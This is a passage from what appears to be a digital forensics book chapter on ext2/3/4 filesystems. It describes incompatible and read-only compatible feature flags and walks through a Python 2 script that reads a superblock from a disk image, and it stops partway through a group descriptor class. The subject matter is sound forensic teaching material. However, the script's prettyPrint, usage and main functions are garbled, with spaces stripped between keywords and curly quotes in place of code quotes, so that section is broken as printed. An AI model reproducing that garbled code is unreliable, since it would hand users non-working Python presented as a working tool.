Like the stat command, the file command can be applied to files or filesystems. When run against files the file command will display the file type. Note that Linux is much smarter than Windows when it comes to deciding what to do with files. Linux will look inside the file for a file signature while Windows will stupidly use nothing but a file’s extension to determine how it is handled. The results of running file on the MP3 files from Figure 7.7 are shown in Figure 7.9. When run against a disk device the -s (special files) and -L (dereference links) options should be used. Figure 7.10 shows the results of running file -sL /dev/sd* on my laptop.

FIGURE 7.9

Output of file command when run against regular files.

FIGURE 7.10

Output of file command when run against hard disk device files.

From Figure 7.10 it can be seen that my Linux volume has journaling (not surprising as it is an ext4 filesystem), uses extents, and supports large and huge files. These features will be described in more detail later in this chapter.

Incompatible Features

Incompatible features are those that could lead to data corruption or misinterpretation when a filesystem is mounted by a system that doesn’t support them, even when mounted read-only. Not surprisingly, the list of incompatible features is longer than the compatible features list. It should go without saying that if you should not mount a filesystem, it would be a very bad idea to run fsck against it. Incompatible features are summarized in Table 7.3.

Table 7.3. Incompatible Features.

Bit      Name         Description
0x1      Compression  Filesystem is compressed
0x2      Filetype     Directory entries include the file type
0x4      Recover      Filesystem needs recovery
0x8      JournalDev   Journal is stored on an external device
0x10     MetaBG       Meta block groups are in use
0x40     Extents      Filesystem uses extents
0x80     64Bit        Filesystem can be 2^64 blocks (as opposed to 2^32)
0x100    MMP          Multiple mount protection
0x200    FlexBG       Flexible block groups are in use
0x400    EAInode      Inodes can be used for large extended attributes
0x1000   DirData      Data in directory entry
0x2000   BGMetaCsum   Block Group meta checksums
0x4000   LargeDir     Directories > 2 GB or 3-level htree
0x8000   InlineData   Data inline in the inode
0x10000  Encrypt      Encrypted inodes are used in this filesystem

The Compression feature indicates that certain filesystem components may be compressed. Obviously, if your operating system does not support this feature, you will not be able to get meaningful data from the volume.

On extended filesystems the file type is normally stored in the inode with all the other metadata. In order to speed up certain operations, the file type may also be stored in the directory entry if the Filetype feature is enabled. This is done by re-purposing an unused byte in the directory entry. This will be discussed in detail later in this chapter.

The Recover feature flag indicates that a filesystem needs to be recovered. The journal will be consulted during this recovery process. While the journal is normally stored on the same media as the filesystem, it may be stored on an external device if the Journal Dev feature is enabled. The use of Journal Dev is not terribly common, but there are some situations where the performance improvement justifies the extra complexity.

The Meta Block Group feature breaks up a filesystem into many meta block groups sized so that group descriptors can be stored in a single block. This allows filesystems larger than 256 terabytes to be used.

The Extents feature allows more efficient handling of large files. Extents are similar to NTFS data runs in that they allow large files to be more efficiently stored and accessed. Extents will be discussed in detail later in this chapter.

The 64-bit feature increases the maximum number of blocks from 2^32 to 2^64. This is not a terribly common feature, as 32-bit mode already supports filesystems as large as 16 terabytes with 4 kB blocks (2^32 * 4096 bytes), or 256 terabytes with 64 kB blocks. It is more likely to be found when a small block size is desirable, such as with a server that stores a large number of small files.
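The size limit imposed by 32-bit block numbers is simple arithmetic: the maximum number of blocks multiplied by the block size. A short worked example (the function name is hypothetical):

```python
TIB = 2 ** 40   # one terabyte in the binary sense (tebibyte)

def max_filesystem_bytes(block_size, block_number_bits=32):
    """Largest filesystem addressable with the given block number width."""
    return (2 ** block_number_bits) * block_size

print("4 kB blocks:  %d TiB" % (max_filesystem_bytes(4096) // TIB))    # 16
print("64 kB blocks: %d TiB" % (max_filesystem_bytes(65536) // TIB))   # 256
print("1 kB blocks:  %d TiB" % (max_filesystem_bytes(1024) // TIB))    # 4
```

The last line shows why a small block size makes the 64-bit feature attractive: with 1 kB blocks, 32-bit block numbers run out at only 4 terabytes.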

The Multiple Mount Protection feature is used to detect if more than one operating system or process is using a filesystem. When this feature is enabled, any attempts to mount an already mounted filesystem should fail. As a double-check, the mount status (sequence number) is rechecked periodically and the filesystem is remounted read-only if the operating system detects that another entity has mounted it.

Like extents, flexible block groups are used to more efficiently handle large files. When the Flex Block Group feature is enabled, some of the items in adjacent block groups are moved around to allow more data blocks in some groups so that large files have a better chance of being stored contiguously. This feature is often used in conjunction with extents.

Extended attributes were discussed in the previous section. If extended attributes are supported, they may be stored in the inodes or in data blocks. If the Extended Attribute Inode flag is set, then the operating system must support reading extended attributes from the inodes wherever they exist.

We have seen several features that allow more efficient processing of large files. The Directory Data feature is an optimization for small files. When this feature is enabled, small files can be stored completely within their directory entry. Larger files may be split between the directory entry and data blocks. Because the first few bytes often contain a file signature, storing the beginning of a file in the directory entry can speed up many operations by eliminating the need to read data blocks to determine the file type. The Inline Data feature is similar, but data is stored in the inodes instead of the directory entries.

The remaining incompatible features are Block Group Meta Checksum, Large Directory, and Encrypt which indicate that checksums for metadata are stored in the block groups, directories larger than 2 gigabytes or using 3-level hash trees are present, and that inodes are encrypted, respectively. None of these three features are common.

For all of these incompatible features, we are most interested in the ones that affect our filesystem layout. There are three such features: Flexible Block Groups, Meta Block Groups, and 64-bit Mode. Flexible block groups combine multiple block groups together in a flex group. The flex group size is normally a power of two. The data and inode bitmaps and the inode table are only present in the first block group within the flex group. This allows some block groups to consist entirely of data blocks which allows large files to be stored without fragmentation.

When meta block groups are in use, the filesystem is partitioned into several logical chunks called meta block groups. The group descriptors are only found in the first, second, and last block group for each meta block group.
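To make the placement rule concrete, the sketch below computes which block groups would hold group descriptors for a given meta block group. It assumes that a meta block group contains as many block groups as there are descriptors in one block, and that descriptors are 32 bytes (64 bytes in 64-bit mode); the function name and defaults are hypothetical.

```python
def meta_bg_descriptor_groups(meta_group, block_size=4096, desc_size=32):
    """Return the block groups holding descriptors for one meta block group."""
    # Number of block groups whose descriptors fit in a single block.
    groups_per_meta = block_size // desc_size
    first = meta_group * groups_per_meta
    # Descriptors live in the first group, with copies in the second
    # and last groups of the meta block group.
    return [first, first + 1, first + groups_per_meta - 1]

print(meta_bg_descriptor_groups(0))             # [0, 1, 127]
print(meta_bg_descriptor_groups(1, 4096, 64))   # [64, 65, 127]
```

On a real filesystem the final meta block group may be incomplete, so the "last" group would need to be clamped to the actual number of block groups.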

The use of 64-bit mode does not directly affect the filesystem layout. Rather, the effect is indirect as some structures will grow in size when 64-bit mode is in use.

Read-only Compatible Features

Read-only compatible features are required to be supported in order to alter data, but not needed to correctly read data. Obviously, if your operating system does not support one or more of these features, you should not run fsck against the filesystem. Read-only compatible features are summarized in Table 7.4.

Table 7.4. Read-only Compatible Features.

Bit     Name          Description
0x1     SparseSuper   Sparse superblocks (only in BG 0 or power of 3, 5, or 7)
0x2     LargeFile     File(s) larger than 2 GB exist on the filesystem
0x4     BtreeDir      Btrees are used in directories (not common)
0x8     HugeFile      File sizes are represented in logical blocks, not sectors
0x10    GdtCsum       Group descriptor tables have checksums
0x20    DirNlink      Subdirectories are not limited to 32k entries
0x40    ExtraIsize    Indicates large inodes are present on the filesystem
0x80    HasSnapshot   Filesystem has a snapshot
0x100   Quota         Disk quotas are being used on the filesystem
0x200   BigAlloc      File extents are tracked in multi-block clusters
0x400   MetadataCsum  Checksums are used on metadata items
0x800   Replica       The filesystem supports replicas
0x1000  ReadOnly      Should only be mounted as read-only

When the Sparse Superblock feature is in use, the superblock is only found in block group 0 or in block groups that are a power of 3, 5, or 7. If there is at least one file greater than 2 gigabytes on the filesystem, the Large File feature flag will be set. The Huge File feature flag indicates at least one huge file is present. Huge files have their sizes specified in logical blocks instead of sectors.
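The sparse superblock rule can be turned into a short function that lists which block groups hold a superblock copy. This is a sketch of the rule as stated above; the function name is hypothetical. Note that group 1 qualifies because it is the zeroth power of 3, 5, and 7.

```python
def sparse_super_groups(group_count):
    """Return block groups holding a superblock under Sparse Super."""
    groups = set([0])
    for base in (3, 5, 7):
        power = 1   # base ** 0
        while power < group_count:
            groups.add(power)
            power *= base
    return sorted(groups)

# The PFE subject image has 128 block groups.
print(sparse_super_groups(128))
# [0, 1, 3, 5, 7, 9, 25, 27, 49, 81, 125]
```

For the subject image this means only 11 of the 128 block groups carry a superblock, which is where an examiner would look for backups if the primary copy were damaged.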

The Btree Directory feature allows large directories to be stored in B-trees. This is not common. Another feature related to large directories is Directory Nlink. When the Directory Nlink flag is set, subdirectories are not limited to 32,768 entries as in previous versions of ext3.

The GDT Checksum feature allows checksums to be stored in the group descriptor tables. The Extra Isize feature flag indicates that large inodes are present on the filesystem. If a filesystem snapshot is present, the Has Snapshot flag will be set. Disk quota use is indicated by the Quota feature flag.

The Big Alloc feature is useful if most of the files on the filesystem are huge. When this is in use, file extents (discussed later in this chapter) and other filesystem structures use multi-block clusters for units. The Metadata Checksum flag indicates that checksums are stored for the metadata items in inodes, etc. If a filesystem supports replicas, the Replica flag will be set. A filesystem with the Read Only flag set should only be mounted as read-only. This flag can be set to prevent others from modifying the filesystem’s contents.

Only two features in the read-only compatible set affect the filesystem layout: Sparse Super Blocks and Extra Isize. Sparse super blocks affect which block groups have superblock backups. Like 64-bit mode, the Extra Isize feature affects the layout indirectly by changing the inode size.

USING PYTHON

We have seen how fsstat and other tools can be used to get metadata from an image file. We will now turn our attention to using Python to extract this information. Some of you might question going to the trouble of creating some Python code when tools already exist for this purpose. This is certainly a fair question.

I do think developing some Python modules is a good idea for a number of reasons. First, I have found that tools such as The Sleuth Kit (TSK) do not appear to be completely up to date. As you will see when running the Python scripts from this section, there are several features in use on the PFE subject filesystem that are not reported by TSK.

Second, it is useful to have some Python code that you understand in your toolbox. This allows you to modify the code as new features are added. It also allows you to integrate filesystem data into other scripts you might use.

Third, walking through these structures in order to develop the Python code helps you to better understand and learn how the extended filesystems work. If you are new to Python, you might also learn something new along the way. We begin our journey by creating code to read the superblock.

Reading the Superblock

The following code will allow you to read a superblock from a disk image. We will walk through most, but not all, of this code. A note on formatting: many of the comments that were originally at the end of lines have been moved to the line above to make the code more legible in this book.

#!/usr/bin/python
#
# extfs.py
#
# This is a simple Python script that will
# get metadata from an ext2/3/4 filesystem inside
# of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

import sys
import os.path
import subprocess
import struct
import time


# these are simple functions to make conversions easier
def getU32(data, offset=0):
    return struct.unpack('<L', data[offset:offset+4])[0]

def getU16(data, offset=0):
    return struct.unpack('<H', data[offset:offset+2])[0]

def getU8(data, offset=0):
    return struct.unpack('B', data[offset:offset+1])[0]

def getU64(data, offset=0):
    return struct.unpack('<Q', data[offset:offset+8])[0]

# this function doesn't unpack the string because
# it isn't really a number but a UUID
def getU128(data, offset=0):
    return data[offset:offset+16]

def printUuid(data):
    retStr = \
        format(struct.unpack('<Q', data[8:16])[0], 'X').zfill(16) + \
        format(struct.unpack('<Q', data[0:8])[0], 'X').zfill(16)
    return retStr


def getCompatibleFeaturesList(u32):
    retList = []
    if u32 & 0x1:
        retList.append('Directory Preallocate')
    if u32 & 0x2:
        retList.append('Imagic Inodes')
    if u32 & 0x4:
        retList.append('Has Journal')
    if u32 & 0x8:
        retList.append('Extended Attributes')
    if u32 & 0x10:
        retList.append('Resize Inode')
    if u32 & 0x20:
        retList.append('Directory Index')
    if u32 & 0x40:
        retList.append('Lazy Block Groups')
    if u32 & 0x80:
        retList.append('Exclude Inode')
    if u32 & 0x100:
        retList.append('Exclude Bitmap')
    if u32 & 0x200:
        retList.append('Sparse Super 2')
    return retList


def getIncompatibleFeaturesList(u32):
    retList = []
    if u32 & 0x1:
        retList.append('Compression')
    if u32 & 0x2:
        retList.append('Filetype')
    if u32 & 0x4:
        retList.append('Recover')
    if u32 & 0x8:
        retList.append('Journal Device')
    if u32 & 0x10:
        retList.append('Meta Block Groups')
    if u32 & 0x40:
        retList.append('Extents')
    if u32 & 0x80:
        retList.append('64-bit')
    if u32 & 0x100:
        retList.append('Multiple Mount Protection')
    if u32 & 0x200:
        retList.append('Flexible Block Groups')
    if u32 & 0x400:
        retList.append('Extended Attributes in Inodes')
    if u32 & 0x1000:
        retList.append('Directory Data')
    if u32 & 0x2000:
        retList.append('Block Group Metadata Checksum')
    if u32 & 0x4000:
        retList.append('Large Directory')
    if u32 & 0x8000:
        retList.append('Inline Data')
    if u32 & 0x10000:
        retList.append('Encrypted Inodes')
    return retList


def getReadonlyCompatibleFeaturesList(u32):
    retList = []
    if u32 & 0x1:
        retList.append('Sparse Super')
    if u32 & 0x2:
        retList.append('Large File')
    if u32 & 0x4:
        retList.append('Btree Directory')
    if u32 & 0x8:
        retList.append('Huge File')
    if u32 & 0x10:
        retList.append('Group Descriptor Table Checksum')
    if u32 & 0x20:
        retList.append('Directory Nlink')
    if u32 & 0x40:
        retList.append('Extra Isize')
    if u32 & 0x80:
        retList.append('Has Snapshot')
    if u32 & 0x100:
        retList.append('Quota')
    if u32 & 0x200:
        retList.append('Big Alloc')
    if u32 & 0x400:
        retList.append('Metadata Checksum')
    if u32 & 0x800:
        retList.append('Replica')
    if u32 & 0x1000:
        retList.append('Read-only')
    return retList


# This class will parse the data in a superblock
class Superblock():
    def __init__(self, data):
        self.totalInodes = getU32(data)
        self.totalBlocks = getU32(data, 4)
        self.restrictedBlocks = getU32(data, 8)
        self.freeBlocks = getU32(data, 0xc)
        self.freeInodes = getU32(data, 0x10)
        # normally 0 unless block size is < 4k
        self.firstDataBlock = getU32(data, 0x14)
        # block size is 1024 * 2^(whatever is in this field)
        # (** is exponentiation; ^ would be bitwise XOR)
        self.blockSize = 2 ** (10 + getU32(data, 0x18))
        # only used if bigalloc feature enabled
        self.clusterSize = 2 ** (getU32(data, 0x1c))
        self.blocksPerGroup = getU32(data, 0x20)
        # only used if bigalloc feature enabled
        self.clustersPerGroup = getU32(data, 0x24)
        self.inodesPerGroup = getU32(data, 0x28)
        self.mountTime = time.gmtime(getU32(data, 0x2c))
        self.writeTime = time.gmtime(getU32(data, 0x30))
        # mounts since last fsck
        self.mountCount = getU16(data, 0x34)
        # mounts between fsck
        self.maxMountCount = getU16(data, 0x36)
        # should be 0xef53
        self.magic = getU16(data, 0x38)
        # 0001/0002/0004 = cleanly unmounted/errors/orphans
        self.state = getU16(data, 0x3a)
        # when errors 1/2/3 continue/read-only/panic
        self.errors = getU16(data, 0x3c)
        self.minorRevision = getU16(data, 0x3e)
        # last fsck time
        self.lastCheck = time.gmtime(getU32(data, 0x40))
        # seconds between checks
        self.checkInterval = getU32(data, 0x44)
        # 0/1/2/3/4 Linux/Hurd/Masix/FreeBSD/Lites
        self.creatorOs = getU32(data, 0x48)
        # 0/1 original/v2 with dynamic inode sizes
        self.revisionLevel = getU32(data, 0x4c)
        # UID for reserved blocks
        self.defaultResUid = getU16(data, 0x50)
        # GID for reserved blocks
        self.defaultRegGid = getU16(data, 0x52)
        # for Ext4 dynamic revisionLevel superblocks only!
        # first non-reserved inode
        self.firstInode = getU32(data, 0x54)
        # inode size in bytes
        self.inodeSize = getU16(data, 0x58)
        # block group this superblock is in
        self.blockGroupNumber = getU16(data, 0x5a)

        # compatible features
        self.compatibleFeatures = getU32(data, 0x5c)
        self.compatibleFeaturesList = \
            getCompatibleFeaturesList(self.compatibleFeatures)
        # incompatible features
        self.incompatibleFeatures = getU32(data, 0x60)
        self.incompatibleFeaturesList = \
            getIncompatibleFeaturesList(self.incompatibleFeatures)
        # read-only compatible features
        self.readOnlyCompatibleFeatures = getU32(data, 0x64)
        self.readOnlyCompatibleFeaturesList = \
            getReadonlyCompatibleFeaturesList(\
            self.readOnlyCompatibleFeatures)
        # UUID for volume left as a packed string
        self.uuid = getU128(data, 0x68)
        # volume name - likely empty
        self.volumeName = data[0x78:0x88].split("\x00")[0]
        # directory where last mounted
        self.lastMounted = data[0x88:0xc8].split("\x00")[0]
        # used with compression
        self.algorithmUsageBitmap = getU32(data, 0xc8)
        # not used in ext4
        self.preallocBlocks = getU8(data, 0xcc)
        # only used with DIR_PREALLOC feature
        self.preallocDirBlock = getU8(data, 0xcd)
        # blocks reserved for future expansion
        self.reservedGdtBlocks = getU16(data, 0xce)
        # UUID of journal superblock
        self.journalUuid = getU128(data, 0xd0)
        # inode number of journal file
        self.journalInode = getU32(data, 0xe0)
        # device number for journal if external journal used
        self.journalDev = getU32(data, 0xe4)
        # start of list of orphaned inodes to delete
        self.lastOrphan = getU32(data, 0xe8)
        # htree hash seed (four 32-bit values)
        self.hashSeed = []
        self.hashSeed.append(getU32(data, 0xec))
        self.hashSeed.append(getU32(data, 0xf0))
        self.hashSeed.append(getU32(data, 0xf4))
        self.hashSeed.append(getU32(data, 0xf8))
        # 0/1/2/3/4/5 legacy/half MD4/tea/u-legacy/u-half MD4/u-Tea
        self.hashVersion = getU8(data, 0xfc)
        self.journalBackupType = getU8(data, 0xfd)
        # group descriptor size if 64-bit feature enabled
        self.descriptorSize = getU16(data, 0xfe)
        self.defaultMountOptions = getU32(data, 0x100)
        # only used with meta bg feature
        self.firstMetaBlockGroup = getU32(data, 0x104)
        # when was the filesystem created
        self.mkfsTime = time.gmtime(getU32(data, 0x108))
        self.journalBlocks = []
        # backup copy of the journal inode's block array,
        # with the size in the last two elements
        for i in range(0, 17):
            self.journalBlocks.append(getU32(data, 0x10c + i*4))

        # for 64-bit mode only
        self.blockCountHi = getU32(data, 0x150)
        self.reservedBlockCountHi = getU32(data, 0x154)
        self.freeBlocksHi = getU32(data, 0x158)
        # all inodes have at least this much space
        self.minInodeExtraSize = getU16(data, 0x15c)
        # new inodes should reserve this many bytes
        self.wantInodeExtraSize = getU16(data, 0x15e)
        # 1/2/4 signed hash/unsigned hash/test code
        self.miscFlags = getU32(data, 0x160)
        # logical blocks read from disk in RAID before moving to next disk
        self.raidStride = getU16(data, 0x164)
        # seconds to wait between multi-mount checks
        self.mmpInterval = getU16(data, 0x166)
        # block number for MMP data
        self.mmpBlock = getU64(data, 0x168)
        # how many blocks read/write till back on this disk
        self.raidStripeWidth = getU32(data, 0x170)
        # groups per flex group (** is exponentiation; ^ would be XOR)
        self.groupsPerFlex = 2 ** (getU8(data, 0x174))
        # should be 1 for crc32
        self.metadataChecksumType = getU8(data, 0x175)
        # should be zeroes
        self.reservedPad = getU16(data, 0x176)
        # kilobytes written for all time
        self.kilobytesWritten = getU64(data, 0x178)
        # inode of active snapshot
        self.snapshotInode = getU32(data, 0x180)
        # id of the active snapshot
        self.snapshotId = getU32(data, 0x184)
        # blocks reserved for snapshot
        self.snapshotReservedBlocks = getU64(data, 0x188)
        # inode number of head of snapshot list
        self.snapshotList = getU32(data, 0x190)
        self.errorCount = getU32(data, 0x194)
        # time first error detected
        self.firstErrorTime = time.gmtime(getU32(data, 0x198))
        # guilty inode
        self.firstErrorInode = getU32(data, 0x19c)
        # guilty block
        self.firstErrorBlock = getU64(data, 0x1a0)
        # guilty function
        self.firstErrorFunction = data[0x1a8:0x1c8].split("\x00")[0]
        # line number where error occurred
        self.firstErrorLine = getU32(data, 0x1c8)
        # time last error detected
        self.lastErrorTime = time.gmtime(getU32(data, 0x1cc))
        # guilty inode
        self.lastErrorInode = getU32(data, 0x1d0)
        # line number where error occurred
        self.lastErrorLine = getU32(data, 0x1d4)
        # guilty block
        self.lastErrorBlock = getU64(data, 0x1d8)
        # guilty function
        self.lastErrorFunction = data[0x1e0:0x200].split("\x00")[0]
        # mount options in null-terminated string
        self.mountOptions = data[0x200:0x240].split("\x00")[0]
        # inode of user quota file
        self.userQuotaInode = getU32(data, 0x240)
        # inode of group quota file
        self.groupQuotaInode = getU32(data, 0x244)
        # should be zero
        self.overheadBlocks = getU32(data, 0x248)
        # sparse super 2 only
        self.backupBlockGroups = [getU32(data, 0x24c), \
            getU32(data, 0x250)]
        # four one-byte algorithm codes follow the backup group numbers
        self.encryptionAlgorithms = []
        for i in range(0, 4):
            self.encryptionAlgorithms.append(getU8(data, 0x254 + i))
        self.checksum = getU32(data, 0x3fc)


    def printState(self):
        # 0001/0002/0004 = cleanly unmounted/errors/orphans
        retVal = "Unknown"
        if self.state == 1:
            retVal = "Cleanly unmounted"
        elif self.state == 2:
            retVal = "Errors detected"
        elif self.state == 4:
            retVal = "Orphans being recovered"
        return retVal

    def printErrorBehavior(self):
        # when errors 1/2/3 continue/read-only/panic
        retVal = "Unknown"
        if self.errors == 1:
            retVal = "Continue"
        elif self.errors == 2:
            retVal = "Remount read-only"
        elif self.errors == 3:
            retVal = "Kernel panic"
        return retVal

    def printCreator(self):
        # 0/1/2/3/4 Linux/Hurd/Masix/FreeBSD/Lites
        retVal = "Unknown"
        if self.creatorOs == 0:
            retVal = "Linux"
        elif self.creatorOs == 1:
            retVal = "Hurd"
        elif self.creatorOs == 2:
            retVal = "Masix"
        elif self.creatorOs == 3:
            retVal = "FreeBSD"
        elif self.creatorOs == 4:
            retVal = "Lites"
        return retVal

    def printHashAlgorithm(self):
        # 0/1/2/3/4/5 legacy/half MD4/tea/u-legacy/u-half MD4/u-Tea
        retVal = "Unknown"
        if self.hashVersion == 0:
            retVal = "Legacy"
        elif self.hashVersion == 1:
            retVal = "Half MD4"
        elif self.hashVersion == 2:
            retVal = "Tea"
        elif self.hashVersion == 3:
            retVal = "Unsigned Legacy"
        elif self.hashVersion == 4:
            retVal = "Unsigned Half MD4"
        elif self.hashVersion == 5:
            retVal = "Unsigned Tea"
        return retVal

    def printEncryptionAlgorithms(self):
        encList = []
        for v in self.encryptionAlgorithms:
            if v == 1:
                encList.append('256-bit AES in XTS mode')
            elif v == 2:
                encList.append('256-bit AES in GCM mode')
            elif v == 3:
                encList.append('256-bit AES in CBC mode')
            elif v == 0:
                pass
            else:
                encList.append('Unknown')
        return encList

defprettyPrint(self):

fork,vinself.__dict__.iteritems():

ifk==‘mountTime’ork==‘writeTime’or\

k==‘lastCheck’ork==‘mkfsTime’or\

k==‘firstErrorTime’ork==‘lastErrorTime’:

printk+”:”,time.asctime(v)

elifk==‘state’:

printk+”:”,self.printState()

elifk==‘errors’:

printk+”:”,self.printErrorBehavior()

elifk==‘uuid’ork==‘journalUuid’:

printk+”:”,printUuid(v)

elifk==‘creatorOs’:

printk+”:”,self.printCreator()

elifk==‘hashVersion’:

printk+”:”,self.printHashAlgorithm()

elifk==‘encryptionAlgorithms’:

printk+”:”,self.printEncryptionAlgorithms()

else:

printk+”:”,v

defusage():

print(“usage“+sys.argv[0]+\

“<imagefile><offsetinsectors>\n”+\

“Readssuperblockfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print("File " + sys.argv[1] + \
" cannot be opened for reading")

exit(1)

withopen(sys.argv[1],‘rb’)asf:

f.seek(1024+int(sys.argv[2])*512)

sbRaw=str(f.read(1024))

sb=Superblock(sbRaw)

sb.prettyPrint()

if__name__==“__main__”:

main()

This script begins with the usual she-bang line followed by a few import statements. I then define a few helper functions, getU32 and so on, that take a packed string with an optional offset and return the appropriate numerical value. All of the numeric helper functions use struct.unpack. These were created to make the code that follows a bit cleaner and easier to read.
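To make the helper idea concrete, here is a minimal sketch of two such helpers applied to a made-up buffer. The names get_u32 and get_u16 and the sample bytes are illustrative assumptions rather than part of the script, and the code is written so that it should also run under Python 3.

```python
import struct

def get_u32(data, offset=0):
    # '<L' means a little-endian unsigned 32-bit integer
    return struct.unpack('<L', data[offset:offset + 4])[0]

def get_u16(data, offset=0):
    # '<H' means a little-endian unsigned 16-bit integer
    return struct.unpack('<H', data[offset:offset + 2])[0]

# hypothetical 8-byte buffer, not taken from a real image
sample = struct.pack('<LHH', 0x12345678, 0xEF53, 7)
first = get_u32(sample)      # 32-bit value at offset 0
magic = get_u16(sample, 4)   # 16-bit value at offset 4
```

Slicing before unpacking keeps each helper independent of how long the buffer is.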

Next you will see the printUuid function, which prints a 16-byte UUID in the correct format. This is followed by three functions which return lists of strings representing the compatible, incompatible, and read-only compatible feature lists. These three functions use the bitwise AND operator, &, to test if the appropriate bit in one of the feature bitmaps is set.
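The bit test can be sketched in a few lines. The three bit values below are the ones the script uses for read-only compatible features. The function name decode_features and the sample bitmap are assumptions made for illustration only.

```python
# bit values for three read-only compatible features
SPARSE_SUPER = 0x1
LARGE_FILE = 0x2
HUGE_FILE = 0x8

def decode_features(bitmap):
    names = []
    # bitmap & mask is non-zero only when that bit is set
    if bitmap & SPARSE_SUPER:
        names.append('Sparse Super')
    if bitmap & LARGE_FILE:
        names.append('Large File')
    if bitmap & HUGE_FILE:
        names.append('Huge File')
    return names

# hypothetical bitmap with bits 0x1, 0x2 and 0x8 set
features = decode_features(0x0B)
```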

Next we see the definition for the Superblock class. Like all proper Python classes, this begins with a constructor, which you will recall is named __init__ in Python. The constructor consists of a long list of calls to the helper functions defined at the beginning of the script. Most of this constructor is straightforward. A few of the less obvious lines are commented.

There are a number of time fields in the superblock. All of these fields store times in seconds since the epoch (January 1, 1970, at midnight UTC). These seconds are converted to times by calling time.gmtime(<seconds since epoch>). For example, self.mountTime = time.gmtime(getU32(data, 0x2c)) is used to set the mountTime variable in the Superblock class.
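A quick sketch of the conversion follows. The value of mount_seconds is a hypothetical timestamp chosen for illustration, not one read from the subject image.

```python
import time

# zero seconds is the epoch itself
epoch = time.gmtime(0)

# hypothetical value, as if it had been read from offset 0x2c
mount_seconds = 1436745600
mount_time = time.gmtime(mount_seconds)

# time.asctime turns the struct_time into a printable string
text = time.asctime(mount_time)
```

Because gmtime is used rather than localtime, the result does not depend on the time zone of the forensics workstation.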

The split function used in this constructor is new. The split function is used to split a string on a character or set of characters. The syntax for split is string.split(<string>[, <separators>[, <maxsplit>]]); the script uses the equivalent method form, <string>.split(<separators>). If the separator is not specified, the string is split on whitespace characters. Lines such as self.volumeName = data[0x78:0x88].split("\x00")[0] are used to split a string on a null character ("\x00") and keep only everything before the null byte. This is done to prevent random bytes after the null from corrupting our value.
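The effect of splitting on the null byte can be seen with a made-up field. The bytes in field are an assumption for illustration. The sketch uses byte strings (the b prefix) so that it behaves the same way under Python 3, where data read from a file opened in binary mode is of type bytes.

```python
# hypothetical 16-byte volume name field: a name, a null, then junk
field = b'rootfs\x00\x00\x00\xde\xad\xbe\xef\x00\x00\x00'

# keep only what precedes the first null byte
name = field.split(b'\x00')[0]

# a field that starts with a null yields an empty name
empty = b'\x00leftover'.split(b'\x00')[0]
```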

In a few cases, an empty list is created and then the append function is used to add items to the list. There are also a few sizes that are stored as powers of two. With the exceptions noted above, there are no new techniques as yet undiscussed in this book.

The Superblock class then defines a few functions that print the filesystem state, error behavior, creator operating system, hash algorithm, and encryption algorithms in a user-friendly way. The Superblock class ends with a prettyPrint function which is used to print out all the information contained within a superblock object. This function uses a dictionary which is implicitly defined for all Python objects.

For those new to Python, a dictionary is essentially a list with an important difference. Instead of using integer indexes as a key to retrieving items from the list (the values), a key such as a string is used. Where empty square brackets are used to define an empty list, empty curly brackets are used to create an empty dictionary. As with lists, square brackets are used to retrieve items. Also, just like lists, items stored in a dictionary may be of different types. It should be noted that in the version of Python used in this book there is no order to items in a dictionary, so the order in which items are added is irrelevant.

The implicitly defined dictionary Python creates for each object is called __dict__. The keys are the names of the object's variables and the values are whatever is stored in those variables. The line for k, v in self.__dict__.iteritems(): in the Superblock.prettyPrint function demonstrates the syntax for creating a for loop that iterates over a dictionary. The if/elif/else block in prettyPrint is used to print the items that are not simple strings or numbers correctly.
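The same pattern can be tried on a tiny class. The Sample class and its two fields are assumptions for illustration. The sketch calls items() instead of iteritems() so that it should run under both Python 2 and Python 3.

```python
class Sample(object):
    def __init__(self):
        # each assignment to self adds an entry to self.__dict__
        self.magic = 0xEF53
        self.state = 1

    def describe(self):
        lines = []
        # sorted() gives a stable order for the key/value pairs
        for k, v in sorted(self.__dict__.items()):
            if k == 'magic':
                # special-case a field that reads better in hex
                lines.append(k + ': ' + hex(v))
            else:
                lines.append(k + ': ' + str(v))
        return lines

lines = Sample().describe()
```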

The script defines usage and main functions. The if __name__ == "__main__": main() at the end of the script allows it to be run or imported into another script. The main method opens the image file and then seeks to the proper location. Recall that the superblock is 1024 bytes long and begins 1024 bytes into the filesystem. Once the correct bytes have been read, they are passed to the Superblock constructor on the line sb = Superblock(sbRaw) and then the fields of the superblock are printed on the next line, sb.prettyPrint().
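The seek arithmetic can be checked without a real image. In the sketch below the helper name superblock_position, the starting sector of 4, and the in-memory image are all assumptions for illustration. Only the 512-byte sector size, the 1024-byte offset, and the location of the magic number at 0x38 come from the script.

```python
import io
import struct

SECTOR_SIZE = 512
SUPERBLOCK_OFFSET = 1024

def superblock_position(start_sector):
    # byte position of the superblock within the image file
    return start_sector * SECTOR_SIZE + SUPERBLOCK_OFFSET

# build a tiny fake image: a partition starting at sector 4
image = bytearray(4 * SECTOR_SIZE + 2048)
pos = superblock_position(4)
struct.pack_into('<H', image, pos + 0x38, 0xEF53)

# read it back the same way main() does
f = io.BytesIO(bytes(image))
f.seek(pos)
sb_raw = f.read(1024)
magic = struct.unpack('<H', sb_raw[0x38:0x3a])[0]
```

Checking that the magic number comes back as 0xef53 is a cheap way to confirm that the offset passed on the command line was right.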

Partial results from running this new script against the PFE subject system are shown in Figure 7.11. Examining Figure 7.11 you will see that the subject system has the following read-only compatible features: Sparse Super, Large File, Huge File, Group Descriptor Table Checksum, Directory Nlink, and Extra Isize. Upon comparing this to Figure 7.3 you will see that The Sleuth Kit missed two features: Group Descriptor Table Checksum and Directory Nlink! In order to continue building the full picture of how our filesystem is organized, we must read the block group descriptors.

FIGURE 7.11

Partial output of script that reads superblock information.

Reading block group descriptors

The block group descriptors are much simpler and smaller than the superblock. Recall that these group descriptors are 32 bytes long, unless an ext4 filesystem is using 64-bit mode, in which case they are 64 bytes long. The following code defines a GroupDescriptor class. As with the Superblock class, comments that would normally be at the end of a line have been placed above the line to make things more legible in this book.

class GroupDescriptor():
    def __init__(self, data, wide=False):
        # remember whether this is a 64-byte descriptor;
        # later code tests this as bgd.wide
        self.wide = wide
        # /* Blocks bitmap block */
        self.blockBitmapLo = getU32(data)
        # /* Inodes bitmap block */
        self.inodeBitmapLo = getU32(data, 4)
        # /* Inodes table block */
        self.inodeTableLo = getU32(data, 8)
        # /* Free blocks count */
        self.freeBlocksCountLo = getU16(data, 0xc)
        # /* Free inodes count */
